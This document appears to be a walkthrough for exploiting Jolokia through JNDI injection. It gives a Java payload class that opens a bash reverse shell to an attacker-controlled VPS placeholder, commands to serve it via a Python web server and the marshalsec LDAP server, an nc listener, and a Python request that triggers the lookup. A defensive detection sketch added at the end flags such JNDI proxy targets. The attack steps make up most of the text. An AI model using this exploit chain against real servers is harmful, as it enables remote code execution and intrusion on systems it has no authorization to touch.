1. Save the Java exploit code as Exploit.java, then compile it to a class file: javac Exploit.java
public class Exploit {
    public Exploit() {
        try {
            System.setSecurityManager(null);
            java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp/VPS地址/7777 0>&1`");
        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}
2. Start a web server in the directory containing Exploit.java
python3 -m http.server 80
3. Run the LDAP server on port 1389
marshalsec-0.0.3-SNAPSHOT-all.jar download link
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS地址/#Exploit 1389
4. Start an nc listener
nc -lvp 7777
5. Run the exploit
import requests
#url = 'http://x.x.x.x/jolokia/..;/jolokia/'
url = 'http://x.x.x.x/jolokia'
headers = {
    "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
    "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
    "Content-Type": "application/x-www-form-urlencoded",
}
data = '''{
    "type" : "read",
    "mbean" : "java.lang:type=Memory",
    "target" : {
        "url" : "service:jmx:rmi:///jndi/ldap://VPS地址:1389/Exploit"
    }
}'''
result = requests.post(url, headers=headers, data=data, timeout=5)
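For defenders, the request in step 5 is recognizable by its proxy-mode "target" block, whose JMX service URL is resolved through JNDI over ldap. The following detection sketch is an added example, not code from the original page; the allow-listed backend URL, the function names and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# JMX service URL whose connector is looked up through JNDI, e.g.
# service:jmx:rmi:///jndi/ldap://host:1389/Name  -> group(1) == "ldap"
JNDI_URL = re.compile(r"^service:jmx:[a-z0-9]+://[^/]*/jndi/([a-z]+):", re.I)

# Assumption: the only backend this deployment is meant to proxy to.
ALLOWED_TARGETS = {"service:jmx:rmi:///jndi/rmi://10.0.0.5:9999/jmxrmi"}


def proxy_targets(body):
    """Return every proxy-mode target URL found in a Jolokia POST body."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []
    urls = []
    for req in doc if isinstance(doc, list) else [doc]:  # bulk = JSON array
        target = req.get("target") if isinstance(req, dict) else None
        if isinstance(target, dict) and isinstance(target.get("url"), str):
            urls.append(target["url"].strip())
    return urls


def review(body, allowed=ALLOWED_TARGETS):
    """Return one finding string per proxy target that is not allow-listed."""
    findings = []
    for url in proxy_targets(body):
        if url in allowed:
            continue
        m = JNDI_URL.match(url)
        scheme = m.group(1).lower() if m else None
        if scheme and scheme != "rmi":
            findings.append(f"jndi-{scheme} target: {url}")
        else:
            findings.append(f"unlisted proxy target: {url}")
    return findings


# Constructed sample bodies (192.0.2.10 is a documentation address).
SAMPLES = [
    '{"type":"read","mbean":"java.lang:type=Memory"}',
    '{"type":"read","mbean":"java.lang:type=Memory","target":{"url":"service:jmx:rmi:///jndi/ldap://192.0.2.10:1389/Exploit"}}',
    '[{"type":"version"},{"type":"read","mbean":"java.lang:type=Memory","target":{"url":"service:jmx:rmi:///jndi/rmi://10.0.0.5:9999/jmxrmi"}}]',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(review(body) or "ok")
```

If the deployment never uses Jolokia's proxy mode, an empty allow-list makes every "target" block a finding.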
https://xz.aliyun.com/t/2294
https://www.cnblogs.com/cwkiller/p/13397335.html